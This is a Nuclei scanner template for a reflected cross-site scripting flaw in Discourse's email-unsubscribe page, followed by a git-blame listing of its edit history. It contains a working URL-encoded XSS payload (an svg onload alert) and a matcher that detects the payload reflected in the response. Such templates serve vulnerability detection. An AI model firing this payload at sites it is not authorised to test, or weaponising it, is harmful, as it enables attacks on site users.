nuclei-templates/vulnerabilities/discourse-xss.yaml

id: discourse-xss

info:
  name: Discourse CMS - XSS
  author: madrobot
  severity: medium
  description: Cross-site scripting (XSS) on Discourse CMS

requests:
  - method: GET
    path:
      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
        part: body
:abcd: Justifying id's 2020-09-01 02:25:25 +00:00			`id: discourse-xss`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00
			`info:`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00			`name: Discourse CMS - XSS`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00			`author: madrobot`
Fix syntax 2020-05-24 22:19:21 +00:00			`severity: medium`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00			`description: Cross-site scripting (XSS) on Discourse CMS`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00
			`requests:`
			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'`
Fixed default condition OR to AND in false-positives 2020-07-08 11:38:57 +00:00			`matchers-condition: and`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00			`matchers:`
			`- type: status`
			`status:`
Fix syntax 2020-05-24 22:19:21 +00:00			`- 200`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00			`- type: word`
			`words:`
Fix syntax 2020-05-24 22:19:21 +00:00			`- "<svg/onload=alert(1337)>"`
Create discourse-xss.yaml 2020-04-08 16:10:51 +00:00			`part: body`